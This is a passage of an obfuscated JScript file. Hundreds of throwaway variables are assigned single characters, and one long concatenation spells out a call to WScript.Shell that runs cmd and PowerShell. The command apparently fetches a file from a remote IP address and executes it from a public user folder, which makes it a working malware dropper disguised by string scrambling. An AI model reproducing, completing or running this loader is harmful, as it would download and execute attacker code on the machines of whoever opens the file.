13 | this[flxjg + bmkfkwltl + waiww + fptixpxp + igiyc + dyckvqhvz + xvdhf][bbxmt + fptixpxp + bvyslhj + gtzifjsel + xvdhf + bvyslhj + dkegvr + nolkum + wuqcbxf + bvyslhj + waiww + xvdhf] ( flxjg + bmkfkwltl + waiww + fptixpxp + igiyc + dyckvqhvz + xvdhf + ujcyadlz + bmkfkwltl + eubiuckli + bvyslhj + xfdcj + xfdcj ) [fptixpxp + afbtubr + nisefdsn] ( waiww + wiixyl + nhgpocbo + gcerctirr + dpqzvagax + waiww + gcerctirr + dyckvqhvz + zdufnec + krtwyja + bvyslhj + fptixpxp + pafdzca + eubiuckli + bvyslhj + xfdcj + xfdcj + ujcyadlz + bvyslhj + guxynqbb + bvyslhj + gcerctirr + bnbrvipo + bbxmt + zdufnec + wiixyl + wiixyl + gtzifjsel + nisefdsn + nhgpocbo + gcerctirr + nvxqgau + ehnftbn + nisefdsn + rekwemh + zdufnec + pliuq + bvyslhj + bnbrvipo + flxjg + bvyslhj + nolkum + tgkrxpvbf + bvyslhj + hrnqgj + afbtubr + bvyslhj + pafdzca + xvdhf + gcerctirr + bnbrvipo + dkegvr + afbtubr + xvdhf + tqjyljc + igiyc + xfdcj + bvyslhj + gcerctirr + bbzdqq + xvdhf + bvyslhj + wiixyl + dyckvqhvz + bbzdqq + bdnuqc + igiyc + nisefdsn + rekwemh + zdufnec + igiyc + waiww + bvyslhj + ujcyadlz + dyckvqhvz + nhgpocbo + yvprpaecp + gcerctirr + eubiuckli + xvdhf + xvdhf + dyckvqhvz + fkkqqith + dpqzvagax + dpqzvagax + buntpl + kzvmnm + toloodk + ujcyadlz + buntpl + uuzxi + toloodk + ujcyadlz + buntpl + ujcyadlz + hslnv + yubjs + ljnrezm + dpqzvagax + igiyc + nisefdsn + rekwemh + zdufnec + igiyc + waiww + bvyslhj + ujcyadlz + dyckvqhvz + eubiuckli + dyckvqhvz + nvxqgau + pnwvb + pnwvb + pafdzca + xvdhf + gtzifjsel + fptixpxp + xvdhf + gcerctirr + bbzdqq + xvdhf + bvyslhj + wiixyl + dyckvqhvz + bbzdqq + bdnuqc + igiyc + nisefdsn + rekwemh + zdufnec + igiyc + waiww + bvyslhj + ujcyadlz + dyckvqhvz + nhgpocbo + yvprpaecp + pnwvb + pnwvb + waiww + wiixyl + nhgpocbo + gcerctirr + dpqzvagax + waiww + gcerctirr + nisefdsn + bvyslhj + xvdhf + gcerctirr + afbtubr + pafdzca + bvyslhj + gcerctirr + bdnuqc + bdnuqc + buntpl + kzvmnm + toloodk + ujcyadlz + buntpl + uuzxi + toloodk + ujcyadlz + buntpl + ujcyadlz + hslnv + yubjs + ljnrezm + azidfxp + clcbujgg + clcbujgg + clcbujgg + clcbujgg + bdnuqc + nhgpocbo + gtzifjsel + rekwemh + krtwyja + krtwyja + krtwyja + fptixpxp + zdufnec + zdufnec + xvdhf + bdnuqc + pnwvb + pnwvb + waiww + wiixyl + nhgpocbo + gcerctirr + dpqzvagax + waiww + gcerctirr + fptixpxp + bvyslhj + qhttb + pafdzca + rekwemh + fptixpxp + toloodk + hslnv + gcerctirr + dpqzvagax + pafdzca + gcerctirr + bdnuqc + bdnuqc + buntpl + kzvmnm + toloodk + ujcyadlz + buntpl + uuzxi + toloodk + ujcyadlz + buntpl + ujcyadlz + hslnv + yubjs + ljnrezm + azidfxp + clcbujgg + clcbujgg + clcbujgg + clcbujgg + bdnuqc + nhgpocbo + gtzifjsel + rekwemh + krtwyja + krtwyja + krtwyja + fptixpxp + zdufnec + zdufnec + xvdhf + bdnuqc + uuzxi + hslnv + hslnv + hpxgf + hslnv + hpxgf + hslnv + kzvmnm + uuzxi + hslnv + kzvmnm + hslnv + kzvmnm + kzvmnm + ujcyadlz + nhgpocbo + xfdcj + xfdcj, 0, false ); |
|
14 | } | |
15 | uuzxi = "f"; | |
16 | uuzxi = "z"; | |
17 | uuzxi = "Z"; | |
18 | uuzxi = "V"; | |
19 | uuzxi = "e"; | |
20 | uuzxi = "a"; | |
21 | uuzxi = "4"; | |
22 | kzvmnm = "S"; | |
23 | kzvmnm = "9"; | |
24 | hrnqgj = "F"; | |
25 | hrnqgj = "j"; | |
26 | hrnqgj = "D"; | |
27 | hrnqgj = "L"; | |
28 | hrnqgj = "z"; | |
29 | hrnqgj = "H"; | |
30 | hrnqgj = "K"; | |
31 | hrnqgj = "y"; | |
32 | hrnqgj = "M"; | |
33 | hrnqgj = "z"; | |
34 | hrnqgj = "q"; | |
35 | nhgpocbo = "z"; | |
36 | nhgpocbo = "M"; | |
37 | nhgpocbo = "j"; | |
38 | nhgpocbo = "c"; | |
39 | nhgpocbo = "Y"; | |
40 | nhgpocbo = "U"; | |
41 | nhgpocbo = "E"; | |
42 | nhgpocbo = "S"; | |
43 | nhgpocbo = "l"; | |
44 | nhgpocbo = "C"; | |
45 | nhgpocbo = "M"; | |
46 | nhgpocbo = "p"; | |
47 | nhgpocbo = "a"; | |
48 | nhgpocbo = "A"; | |
49 | nhgpocbo = "l"; | |
50 | nhgpocbo = "d"; | |
51 | tqjyljc = "a"; | |
52 | tqjyljc = "A"; | |
53 | tqjyljc = "r"; | |
54 | tqjyljc = "x"; | |
55 | tqjyljc = "I"; | |
56 | tqjyljc = "G"; | |
57 | tqjyljc = "X"; | |
58 | tqjyljc = "O"; | |
59 | tqjyljc = "J"; | |
60 | tqjyljc = "L"; | |
61 | tqjyljc = "p"; | |
62 | tqjyljc = "n"; | |
63 | tqjyljc = "Y"; | |
64 | tqjyljc = "u"; | |
65 | tqjyljc = "H"; | |
66 | tqjyljc = "Y"; | |
67 | tqjyljc = "J"; | |
68 | tqjyljc = "F"; | |
69 | afbtubr = "t"; | |
70 | afbtubr = "x"; | |
71 | afbtubr = "u"; | |
72 | afbtubr = "B"; | |
73 | afbtubr = "s"; | |
74 | afbtubr = "G"; | |
75 | afbtubr = "K"; | |
76 | afbtubr = "f"; | |
77 | afbtubr = "J"; | |
78 | afbtubr = "X"; | |
79 | afbtubr = "g"; | |
80 | afbtubr = "i"; | |
81 | afbtubr = "g"; | |
82 | afbtubr = "T"; | |
83 | afbtubr = "Z"; | |
84 | afbtubr = "U"; | |
85 | afbtubr = "G"; | |
86 | afbtubr = "g"; | |
87 | afbtubr = "h"; | |
88 | afbtubr = "B"; | |
89 | afbtubr = "I"; | |
90 | afbtubr = "X"; | |
91 | afbtubr = "P"; | |
92 | afbtubr = "I"; | |
93 | afbtubr = "K"; | |
94 | afbtubr = "W"; | |
95 | afbtubr = "q"; | |
96 | afbtubr = "f"; | |
97 | afbtubr = "u"; | |
98 | afbtubr = "E"; | |
99 | afbtubr = "X"; | |
100 | afbtubr = "P"; | |
101 | afbtubr = "W"; | |
102 | afbtubr = "m"; | |
103 | afbtubr = "v"; | |
104 | afbtubr = "G"; | |
105 | afbtubr = "D"; | |
106 | afbtubr = "u"; | |
107 | wzvmoukut = "h"; | |
108 | wzvmoukut = "j"; | |
109 | wzvmoukut = "u"; | |
110 | wzvmoukut = "v"; | |
111 | wzvmoukut = "e"; | |
112 | wzvmoukut = "M"; | |
113 | wzvmoukut = "U"; | |
114 | wzvmoukut = "y"; | |
115 | wzvmoukut = "U"; | |
116 | wzvmoukut = "h"; | |
117 | wzvmoukut = "p"; | |
118 | wzvmoukut = "Y"; | |
119 | wzvmoukut = "K"; | |
120 | wzvmoukut = "V"; | |
121 | wzvmoukut = "f"; | |
122 | wzvmoukut = "q"; | |
123 | wzvmoukut = "X"; | |
124 | wzvmoukut = "A"; | |
125 | wzvmoukut = "A"; | |
126 | wzvmoukut = "V"; | |
127 | wzvmoukut = "F"; | |
128 | wzvmoukut = "d"; | |
129 | wzvmoukut = "H"; | |
130 | wzvmoukut = "I"; | |
131 | wzvmoukut = "o"; | |
132 | wzvmoukut = "b"; | |
133 | wzvmoukut = "n"; | |
134 | wzvmoukut = "n"; | |
135 | wzvmoukut = "G"; | |
136 | wzvmoukut = "z"; | |
137 | wzvmoukut = "o"; | |
138 | wzvmoukut = "A"; | |
139 | wzvmoukut = "P"; | |
140 | drwvoeoz = "H"; | |
141 | drwvoeoz = "Y"; | |
142 | drwvoeoz = "v"; | |
143 | drwvoeoz = "t"; | |
144 | drwvoeoz = "a"; | |
145 | drwvoeoz = "p"; | |
146 | drwvoeoz = "y"; | |
147 | drwvoeoz = "g"; | |
148 | drwvoeoz = "b"; | |
149 | drwvoeoz = "U"; | |
150 | drwvoeoz = "n"; | |
151 | drwvoeoz = "K"; | |
152 | drwvoeoz = "h"; | |
153 | drwvoeoz = "S"; | |
154 | drwvoeoz = "E"; | |
155 | drwvoeoz = "H"; | |
156 | aecygc = "l"; | |
157 | aecygc = "w"; | |
158 | aecygc = "V"; | |
159 | aecygc = "L"; | |
160 | aecygc = "t"; | |
161 | aecygc = "x"; | |
162 | aecygc = "C"; | |
163 | aecygc = "H"; | |
164 | aecygc = "F"; | |
165 | aecygc = "D"; | |
166 | aecygc = "P"; | |
167 | aecygc = "r"; | |
168 | aecygc = "k"; | |
169 | aecygc = "c"; | |
170 | aecygc = "K"; | |
171 | aecygc = "o"; | |
172 | aecygc = "Z"; | |
173 | aecygc = "f"; | |
174 | aecygc = "S"; | |
175 | aecygc = "w"; | |
176 | aecygc = "U"; | |
177 | aecygc = "p"; | |
178 | aecygc = "o"; | |
179 | aecygc = "u"; | |
180 | aecygc = "Y"; | |
181 | aecygc = "b"; | |
182 | aecygc = "P"; | |
183 | aecygc = "i"; | |
184 | aecygc = "Q"; | |
185 | xaexfbicp = "J"; | |
186 | xaexfbicp = "J"; | |
187 | xaexfbicp = "W"; | |
188 | xaexfbicp = "m"; | |
189 | xaexfbicp = "O"; | |
190 | xaexfbicp = "V"; | |
191 | xaexfbicp = "Y"; | |
192 | xaexfbicp = "H"; | |
193 | xaexfbicp = "G"; | |
194 | xaexfbicp = "X"; | |
195 | xaexfbicp = "h"; | |
196 | xaexfbicp = "K"; | |
197 | xaexfbicp = "g"; | |
198 | xaexfbicp = "g"; | |
199 | xaexfbicp = "R"; | |
200 | xaexfbicp = "D"; | |
201 | xaexfbicp = "a"; | |
202 | xaexfbicp = "H"; | |
203 | xaexfbicp = "K"; | |
204 | xaexfbicp = "D"; | |
205 | xaexfbicp = "e"; | |
206 | xaexfbicp = "o"; | |
207 | xaexfbicp = "V"; | |
208 | xaexfbicp = "h"; | |
209 | xaexfbicp = "v"; | |
210 | xaexfbicp = "u"; | |
211 | xaexfbicp = "Z"; | |
212 | xaexfbicp = "s"; | |
213 | xaexfbicp = "z"; | |
214 | xaexfbicp = "c"; | |
215 | xaexfbicp = "u"; | |
216 | xaexfbicp = "A"; | |
217 | xaexfbicp = "m"; | |
218 | xaexfbicp = "A"; | |
219 | xaexfbicp = "B"; | |
220 | xaexfbicp = "R"; | |
221 | xaexfbicp = "h"; | |
222 | xaexfbicp = "b"; | |
223 | xaexfbicp = "X"; | |
224 | xaexfbicp = "E"; | |
225 | qhttb = "B"; | |
226 | qhttb = "l"; | |
227 | qhttb = "f"; | |
228 | qhttb = "N"; | |
229 | qhttb = "S"; | |
230 | qhttb = "b"; | |
231 | qhttb = "O"; | |
232 | qhttb = "O"; | |
233 | qhttb = "Z"; | |
234 | qhttb = "I"; | |
235 | qhttb = "o"; | |
236 | qhttb = "v"; | |
237 | qhttb = "r"; | |
238 | qhttb = "j"; | |
239 | qhttb = "e"; | |
240 | qhttb = "q"; | |
241 | qhttb = "l"; | |
242 | qhttb = "O"; | |
243 | qhttb = "G"; | |
244 | qhttb = "c"; | |
245 | qhttb = "K"; | |
246 | qhttb = "m"; | |
247 | qhttb = "A"; | |
248 | qhttb = "s"; | |
249 | qhttb = "u"; | |
250 | qhttb = "O"; | |
251 | qhttb = "I"; | |
252 | qhttb = "P"; | |
253 | qhttb = "R"; | |
254 | qhttb = "g"; | |
255 | tgkrxpvbf = "E"; | |
256 | tgkrxpvbf = "s"; | |
257 | tgkrxpvbf = "J"; | |
258 | tgkrxpvbf = "x"; | |
259 | tgkrxpvbf = "m"; | |
260 | tgkrxpvbf = "a"; | |
261 | tgkrxpvbf = "G"; | |
262 | tgkrxpvbf = "d"; | |
263 | tgkrxpvbf = "m"; | |
264 | tgkrxpvbf = "a"; | |
265 | tgkrxpvbf = "R"; | |
266 | tgkrxpvbf = "m"; | |
267 | tgkrxpvbf = "Y"; | |
268 | tgkrxpvbf = "O"; | |
269 | tgkrxpvbf = "i"; | |
270 | tgkrxpvbf = "p"; | |
271 | tgkrxpvbf = "V"; | |
272 | tgkrxpvbf = "b"; | |
273 | tgkrxpvbf = "M"; | |
274 | tgkrxpvbf = "t"; | |
275 | tgkrxpvbf = "p"; | |
276 | tgkrxpvbf = "Y"; | |
277 | tgkrxpvbf = "D"; | |
278 | tgkrxpvbf = "W"; | |
279 | tgkrxpvbf = "p"; | |
280 | tgkrxpvbf = "R"; | |
281 | xvdhf = "n"; | |
282 | xvdhf = "e"; | |
283 | xvdhf = "P"; | |
284 | xvdhf = "Q"; | |
285 | xvdhf = "F"; | |
286 | xvdhf = "F"; | |
287 | xvdhf = "y"; | |
288 | xvdhf = "R"; | |
289 | xvdhf = "P"; | |
290 | xvdhf = "L"; | |
291 | xvdhf = "o"; | |
292 | xvdhf = "B"; | |
293 | xvdhf = "m"; | |
294 | xvdhf = "H"; | |
295 | xvdhf = "k"; | |
296 | xvdhf = "g"; | |
297 | xvdhf = "E"; | |
298 | xvdhf = "o"; | |
299 | xvdhf = "W"; | |
300 | xvdhf = "w"; | |
301 | xvdhf = "A"; | |
302 | xvdhf = "J"; | |
303 | xvdhf = "C"; | |
304 | xvdhf = "I"; | |
305 | xvdhf = "W"; | |
306 | xvdhf = "b"; | |
307 | xvdhf = "I"; | |
308 | xvdhf = "H"; | |
309 | xvdhf = "Q"; | |
310 | xvdhf = "U"; | |
311 | xvdhf = "E"; | |
312 | xvdhf = "n"; | |
313 | xvdhf = "R"; | |
314 | xvdhf = "o"; | |
315 | xvdhf = "G"; | |
316 | xvdhf = "b"; | |
317 | xvdhf = "f"; | |
318 | xvdhf = "W"; | |
319 | xvdhf = "L"; | |
320 | xvdhf = "t"; | |
321 | waiww = "A"; | |
322 | waiww = "P"; | |
323 | waiww = "O"; | |
324 | waiww = "T"; | |
325 | waiww = "m"; | |
326 | waiww = "f"; | |
327 | waiww = "e"; | |
328 | waiww = "S"; | |
329 | waiww = "n"; | |
330 | waiww = "B"; | |
331 | waiww = "e"; | |
332 | waiww = "v"; | |
333 | waiww = "O"; | |
334 | waiww = "c"; | |
335 | pafdzca = "f"; | |
336 | pafdzca = "w"; | |
337 | pafdzca = "H"; | |
338 | pafdzca = "V"; | |
339 | pafdzca = "O"; | |
340 | pafdzca = "w"; | |
341 | pafdzca = "a"; | |
342 | pafdzca = "H"; | |
343 | pafdzca = "O"; | |
344 | pafdzca = "v"; | |
345 | pafdzca = "y"; | |
346 | pafdzca = "V"; | |
347 | pafdzca = "W"; | |
348 | pafdzca = "W"; | |
349 | pafdzca = "u"; | |
350 | pafdzca = "z"; | |
351 | pafdzca = "t"; | |
352 | pafdzca = "L"; | |
353 | pafdzca = "Z"; | |
354 | pafdzca = "i"; | |
355 | pafdzca = "s"; | |
356 | hslnv = "v"; | |
357 | hslnv = "H"; | |
358 | hslnv = "M"; | |
359 | hslnv = "n"; | |
360 | hslnv = "n"; | |
361 | hslnv = "v"; | |
362 | hslnv = "T"; | |
363 | hslnv = "v"; | |
364 | hslnv = "L"; | |
365 | hslnv = "k"; | |
366 | hslnv = "u"; | |
367 | hslnv = "N"; | |
368 | hslnv = "U"; | |
369 | hslnv = "E"; | |
370 | hslnv = "m"; | |
371 | hslnv = "A"; | |
372 | hslnv = "f"; | |
373 | hslnv = "L"; | |
374 | hslnv = "F"; | |
375 | hslnv = "W"; | |
376 | hslnv = "f"; | |
377 | hslnv = "o"; | |
378 | hslnv = "H"; | |
379 | hslnv = "W"; | |
380 | hslnv = "b"; | |
381 | hslnv = "z"; | |
382 | hslnv = "v"; | |
383 | hslnv = "M"; | |
384 | hslnv = "p"; | |
385 | hslnv = "g"; | |
386 | hslnv = "l"; | |
387 | hslnv = "G"; | |
388 | hslnv = "b"; | |
389 | hslnv = "y"; | |
390 | hslnv = "V"; | |
391 | hslnv = "z"; | |
392 | hslnv = "W"; | |
393 | hslnv = "h"; | |
394 | hslnv = "A"; | |
395 | hslnv = "v"; | |
396 | hslnv = "e"; | |
397 | hslnv = "2"; | |
398 | nolkum = "Y"; | |
399 | nolkum = "Q"; | |
400 | nolkum = "i"; | |
401 | nolkum = "U"; | |
402 | nolkum = "M"; | |
403 | nolkum = "x"; | |
404 | nolkum = "L"; | |
405 | nolkum = "P"; | |
406 | nolkum = "b"; | |
407 | hpyrji = "d"; | |
408 | hpyrji = "v"; | |
409 | hpyrji = "V"; | |
410 | hpyrji = "E"; | |
411 | hpyrji = "c"; | |
412 | hpyrji = "K"; | |
413 | hpyrji = "m"; | |
414 | hpyrji = "z"; | |
415 | hpyrji = "K"; | |
416 | hpyrji = "h"; | |
417 | hpyrji = "M"; | |
418 | hpyrji = "F"; | |
419 | hpyrji = "X"; | |
420 | hpyrji = "I"; | |
421 | hpyrji = "E"; | |
422 | hpyrji = "O"; | |
423 | hpyrji = "s"; | |
424 | hpyrji = "F"; | |
425 | hpyrji = "L"; | |
426 | hpyrji = "P"; | |
427 | hpyrji = "q"; | |
428 | hpyrji = "V"; | |
429 | hpyrji = "u"; | |
430 | hpyrji = "F"; | |
431 | hpyrji = "k"; | |
432 | hpyrji = "x"; | |
433 | hpyrji = "L"; | |
434 | hpyrji = "G"; | |
435 | hpyrji = "P"; | |
436 | hpyrji = "Y"; | |
437 | hpyrji = "D"; | |
438 | hpyrji = "h"; | |
439 | hpyrji = "L"; | |
440 | hpyrji = "p"; | |
441 | hpyrji = "u"; | |
442 | hpyrji = "r"; | |
443 | hpyrji = "Z"; | |
444 | hpyrji = "U"; | |
445 | hpyrji = "M"; | |
446 | hpyrji = "E"; | |
447 | hpyrji = "F"; | |
448 | hpyrji = "Y"; | |
449 | hpyrji = "l"; | |
450 | hpyrji = "r"; | |
451 | hpyrji = "N"; | |
452 | zdufnec = "i"; | |
453 | zdufnec = "C"; | |
454 | zdufnec = "X"; | |
455 | zdufnec = "S"; | |
456 | zdufnec = "o"; | |
457 | buntpl = "1"; | |
458 | rekwemh = "E"; | |
459 | rekwemh = "X"; | |
460 | rekwemh = "G"; | |
461 | rekwemh = "V"; | |
462 | rekwemh = "K"; | |
463 | rekwemh = "j"; | |
464 | rekwemh = "v"; | |
465 | ehnftbn = "v"; | |
466 | ehnftbn = "Z"; | |
467 | ehnftbn = "U"; | |
468 | ehnftbn = "L"; | |
469 | ehnftbn = "O"; | |
470 | ehnftbn = "N"; | |
471 | ehnftbn = "G"; | |
472 | ehnftbn = "U"; | |
473 | ehnftbn = "s"; | |
474 | ehnftbn = "P"; | |
475 | ehnftbn = "l"; | |
476 | ehnftbn = "Q"; | |
477 | ehnftbn = "F"; | |
478 | ehnftbn = "z"; | |
479 | ehnftbn = "p"; | |
480 | ehnftbn = "R"; | |
481 | ehnftbn = "g"; | |
482 | ehnftbn = "Q"; | |
483 | ehnftbn = "j"; | |
484 | ehnftbn = "q"; | |
485 | ehnftbn = "s"; | |
486 | ehnftbn = "g"; | |
487 | ehnftbn = "H"; | |
488 | ehnftbn = "x"; | |
489 | ehnftbn = "E"; | |
490 | ehnftbn = "U"; | |
491 | ehnftbn = "k"; | |
492 | ehnftbn = "e"; | |
493 | ehnftbn = "X"; | |
494 | ehnftbn = "o"; | |
495 | ehnftbn = "E"; | |
496 | ehnftbn = "I"; | |
497 | pliuq = "w"; | |
498 | pliuq = "P"; | |
499 | pliuq = "Q"; | |
500 | pliuq = "Z"; | |
501 | pliuq = "M"; | |
502 | pliuq = "F"; | |
503 | pliuq = "u"; | |
504 | pliuq = "q"; | |
505 | pliuq = "g"; | |
506 | pliuq = "j"; | |
507 | pliuq = "c"; | |
508 | pliuq = "b"; | |
509 | pliuq = "k"; | |
510 | bdnuqc = "V"; | |
511 | bdnuqc = "F"; | |
512 | bdnuqc = "K"; | |
513 | bdnuqc = "c"; | |
514 | bdnuqc = "v"; | |
515 | bdnuqc = "R"; | |
516 | bdnuqc = "W"; | |
517 | bdnuqc = "U"; | |
518 | bdnuqc = "P"; | |
519 | bdnuqc = "m"; | |
520 | bdnuqc = "c"; | |
521 | bdnuqc = "O"; | |
522 | bdnuqc = "j"; | |
523 | bdnuqc = "D"; | |
524 | bdnuqc = "a"; | |
525 | bdnuqc = "P"; | |
526 | bdnuqc = "g"; | |
527 | bdnuqc = "g"; | |
528 | bdnuqc = "V"; | |
529 | bdnuqc = "S"; | |
530 | bdnuqc = "z"; | |
531 | bdnuqc = "N"; | |
532 | bdnuqc = "T"; | |
533 | bdnuqc = "x"; | |
534 | bdnuqc = "E"; | |
535 | bdnuqc = "f"; | |
536 | bdnuqc = "N"; | |
537 | bdnuqc = "X"; | |
538 | bdnuqc = "o"; | |
539 | bdnuqc = "P"; | |
540 | bdnuqc = "v"; | |
541 | bdnuqc = "J"; | |
542 | bdnuqc = "l"; | |
543 | bdnuqc = "x"; | |
544 | bdnuqc = "u"; | |
545 | bdnuqc = "p"; | |
546 | bdnuqc = "I"; | |
547 | bdnuqc = "G"; | |
548 | bdnuqc = "X"; | |
549 | bdnuqc = "T"; | |
550 | bdnuqc = "Q"; | |
551 | bdnuqc = "\\"; | |
552 | nvxqgau = "P"; | |
553 | nvxqgau = "X"; | |
554 | nvxqgau = "Z"; | |
555 | nvxqgau = "O"; | |
556 | nvxqgau = "B"; | |
557 | nvxqgau = "j"; | |
558 | nvxqgau = "\""; | |
559 | ujcyadlz = "v"; | |
560 | ujcyadlz = "U"; | |
561 | ujcyadlz = "b"; | |
562 | ujcyadlz = "l"; | |
563 | ujcyadlz = "Y"; | |
564 | ujcyadlz = "G"; | |
565 | ujcyadlz = "D"; | |
566 | ujcyadlz = "R"; | |
567 | ujcyadlz = "E"; | |
568 | ujcyadlz = "G"; | |
569 | ujcyadlz = "o"; | |
570 | ujcyadlz = "l"; | |
571 | ujcyadlz = "M"; | |
572 | ujcyadlz = "D"; | |
573 | ujcyadlz = "H"; | |
574 | ujcyadlz = "M"; | |
575 | ujcyadlz = "t"; | |
576 | ujcyadlz = "P"; | |
577 | ujcyadlz = "b"; | |
578 | ujcyadlz = "z"; | |
579 | ujcyadlz = "."; | |
580 | bmkfkwltl = "b"; | |
581 | bmkfkwltl = "P"; | |
582 | bmkfkwltl = "y"; | |
583 | bmkfkwltl = "T"; | |
584 | bmkfkwltl = "H"; | |
585 | bmkfkwltl = "A"; | |
586 | bmkfkwltl = "c"; | |
587 | bmkfkwltl = "g"; | |
588 | bmkfkwltl = "L"; | |
589 | bmkfkwltl = "L"; | |
590 | bmkfkwltl = "a"; | |
591 | bmkfkwltl = "u"; | |
592 | bmkfkwltl = "Z"; | |
593 | bmkfkwltl = "k"; | |
594 | bmkfkwltl = "O"; | |
595 | bmkfkwltl = "I"; | |
596 | bmkfkwltl = "V"; | |
597 | bmkfkwltl = "v"; | |
598 | bmkfkwltl = "l"; | |
599 | bmkfkwltl = "c"; | |
600 | bmkfkwltl = "L"; | |
601 | bmkfkwltl = "P"; | |
602 | bmkfkwltl = "D"; | |
603 | bmkfkwltl = "Q"; | |
604 | bmkfkwltl = "X"; | |
605 | bmkfkwltl = "W"; | |
606 | bmkfkwltl = "N"; | |
607 | bmkfkwltl = "a"; | |
608 | bmkfkwltl = "l"; | |
609 | bmkfkwltl = "N"; | |
610 | bmkfkwltl = "y"; | |
611 | bmkfkwltl = "F"; | |
612 | bmkfkwltl = "T"; | |
613 | bmkfkwltl = "S"; | |
614 | dkegvr = "y"; | |
615 | dkegvr = "v"; | |
616 | dkegvr = "N"; | |
617 | dkegvr = "L"; | |
618 | dkegvr = "z"; | |
619 | dkegvr = "e"; | |
620 | dkegvr = "A"; | |
621 | dkegvr = "c"; | |
622 | dkegvr = "P"; | |
623 | dkegvr = "q"; | |
624 | dkegvr = "M"; | |
625 | dkegvr = "N"; | |
626 | dkegvr = "J"; | |
627 | dkegvr = "X"; | |
628 | dkegvr = "R"; | |
629 | dkegvr = "O"; | |
630 | dpqzvagax = "u"; | |
631 | dpqzvagax = "B"; | |
632 | dpqzvagax = "J"; | |
633 | dpqzvagax = "f"; | |
634 | dpqzvagax = "W"; | |
635 | dpqzvagax = "h"; | |
636 | dpqzvagax = "d"; | |
637 | dpqzvagax = "w"; | |
638 | dpqzvagax = "a"; | |
639 | dpqzvagax = "a"; | |
640 | dpqzvagax = "C"; | |
641 | dpqzvagax = "k"; | |
642 | dpqzvagax = "F"; | |
643 | dpqzvagax = "m"; | |
644 | dpqzvagax = "F"; | |
645 | dpqzvagax = "a"; | |
646 | dpqzvagax = "y"; | |
647 | dpqzvagax = "m"; | |
648 | dpqzvagax = "b"; | |
649 | dpqzvagax = "A"; | |
650 | dpqzvagax = "L"; | |
651 | dpqzvagax = "u"; | |
652 | dpqzvagax = "x"; | |
653 | dpqzvagax = "/"; | |
654 | bnbrvipo = "S"; | |
655 | bnbrvipo = "U"; | |
656 | bnbrvipo = "p"; | |
657 | bnbrvipo = "g"; | |
658 | bnbrvipo = "f"; | |
659 | bnbrvipo = "c"; | |
660 | bnbrvipo = "m"; | |
661 | bnbrvipo = "i"; | |
662 | bnbrvipo = "T"; | |
663 | bnbrvipo = "i"; | |
664 | bnbrvipo = "c"; | |
665 | bnbrvipo = "G"; | |
666 | bnbrvipo = "I"; | |
667 | bnbrvipo = "V"; | |
668 | bnbrvipo = "c"; | |
669 | bnbrvipo = "d"; | |
670 | bnbrvipo = "W"; | |
671 | bnbrvipo = "j"; | |
672 | bnbrvipo = "n"; | |
673 | bnbrvipo = "y"; | |
674 | bnbrvipo = "d"; | |
675 | bnbrvipo = "R"; | |
676 | bnbrvipo = "U"; | |
677 | bnbrvipo = "B"; | |
678 | bnbrvipo = "Y"; | |
679 | bnbrvipo = "q"; | |
680 | bnbrvipo = "w"; | |
681 | bnbrvipo = "N"; | |
682 | bnbrvipo = "-"; | |
683 | ffnvou = "K"; | |
684 | toloodk = "a"; | |
685 | toloodk = "Z"; | |
686 | toloodk = "P"; | |
687 | toloodk = "R"; | |
688 | toloodk = "v"; | |
689 | toloodk = "d"; | |
690 | toloodk = "D"; | |
691 | toloodk = "K"; | |
692 | toloodk = "A"; | |
693 | toloodk = "K"; | |
694 | toloodk = "o"; | |
695 | toloodk = "r"; | |
696 | toloodk = "R"; | |
697 | toloodk = "f"; | |
698 | toloodk = "H"; | |
699 | toloodk = "Q"; | |
700 | toloodk = "3"; | |
701 | fptixpxp = "r"; | |
702 | pjchqjkc = "O"; | |
703 | pjchqjkc = "s"; | |
704 | pjchqjkc = "W"; | |
705 | pjchqjkc = "B"; | |
706 | pjchqjkc = "y"; | |
707 | pjchqjkc = "e"; | |
708 | pjchqjkc = "H"; | |
709 | pjchqjkc = "d"; | |
710 | pjchqjkc = "Z"; | |
711 | pjchqjkc = "w"; | |
712 | pjchqjkc = "F"; | |
713 | pjchqjkc = "L"; | |
714 | pjchqjkc = "Q"; | |
715 | pjchqjkc = "p"; | |
716 | pjchqjkc = "t"; | |
717 | pjchqjkc = "Y"; | |
718 | pjchqjkc = "Y"; | |
719 | gtzifjsel = "G"; | |
720 | gtzifjsel = "n"; | |
721 | gtzifjsel = "M"; | |
722 | gtzifjsel = "z"; | |
723 | gtzifjsel = "w"; | |
724 | gtzifjsel = "z"; | |
725 | gtzifjsel = "B"; | |
726 | gtzifjsel = "n"; | |
727 | gtzifjsel = "j"; | |
728 | gtzifjsel = "k"; | |
729 | gtzifjsel = "a"; | |
730 | wiixyl = "K"; | |
731 | wiixyl = "B"; | |
732 | wiixyl = "L"; | |
733 | wiixyl = "F"; | |
734 | wiixyl = "I"; | |
735 | wiixyl = "e"; | |
736 | wiixyl = "h"; | |
737 | wiixyl = "y"; | |
738 | wiixyl = "r"; | |
739 | wiixyl = "Z"; | |
740 | wiixyl = "I"; | |
741 | wiixyl = "U"; | |
742 | wiixyl = "h"; | |
743 | wiixyl = "J"; | |
744 | wiixyl = "y"; | |
745 | wiixyl = "V"; | |
746 | wiixyl = "N"; | |
747 | wiixyl = "v"; | |
748 | wiixyl = "L"; | |
749 | wiixyl = "z"; | |
750 | wiixyl = "L"; | |
751 | wiixyl = "Y"; | |
752 | wiixyl = "v"; | |
753 | wiixyl = "M"; | |
754 | wiixyl = "m"; | |
755 | wiixyl = "d"; | |
756 | wiixyl = "c"; | |
757 | wiixyl = "V"; | |
758 | wiixyl = "m"; | |
759 | wiixyl = "Q"; | |
760 | wiixyl = "z"; | |
761 | wiixyl = "T"; | |
762 | wiixyl = "j"; | |
763 | wiixyl = "x"; | |
764 | wiixyl = "q"; | |
765 | wiixyl = "W"; | |
766 | wiixyl = "y"; | |
767 | wiixyl = "p"; | |
768 | wiixyl = "v"; | |
769 | wiixyl = "m"; | |
770 | gcerctirr = "Q"; | |
771 | gcerctirr = "B"; | |
772 | gcerctirr = "d"; | |
773 | gcerctirr = "h"; | |
774 | gcerctirr = "J"; | |
775 | gcerctirr = "Q"; | |
776 | gcerctirr = "f"; | |
777 | gcerctirr = "F"; | |
778 | gcerctirr = "E"; | |
779 | gcerctirr = "H"; | |
780 | gcerctirr = "c"; | |
781 | gcerctirr = "j"; | |
782 | gcerctirr = "t"; | |
783 | gcerctirr = "B"; | |
784 | gcerctirr = "x"; | |
785 | gcerctirr = "E"; | |
786 | gcerctirr = "g"; | |
787 | gcerctirr = "u"; | |
788 | gcerctirr = "g"; | |
789 | gcerctirr = "D"; | |
790 | gcerctirr = "S"; | |
791 | gcerctirr = "g"; | |
